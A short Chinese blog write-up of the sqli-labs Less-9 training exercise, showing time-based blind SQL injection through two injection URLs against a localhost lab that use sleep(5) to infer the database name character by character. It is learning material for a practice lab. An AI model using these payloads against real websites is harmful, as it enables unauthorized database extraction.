当前位置:Gxlcms > 数据库问题 > 【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

时间:2021-07-01 10:21:17 帮助过:30人阅读

技术分享图片

技术分享图片

页面没有变化,一瞬间没弄懂了,看了下源码

发现无论查询的结果是什么,显示都不会有区别

技术分享图片

学习一个函数

sleep(n)      休眠n秒

技术分享图片

5秒后出现结果

技术分享图片

和less8一样是盲注漏洞,构造请求

如果数据库名的第一个字符的ascii码不等于114 则休眠5s

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=114, 0, sleep(5))%23  

浏览器状态栏显示

技术分享图片

=115时没有延时,可以推测第一个字符为 ‘s‘

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23  

技术分享图片

 

【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

标签:数据库名   local   bst   body   状态   等于   alt   分享图片   bubuko   

人气教程排行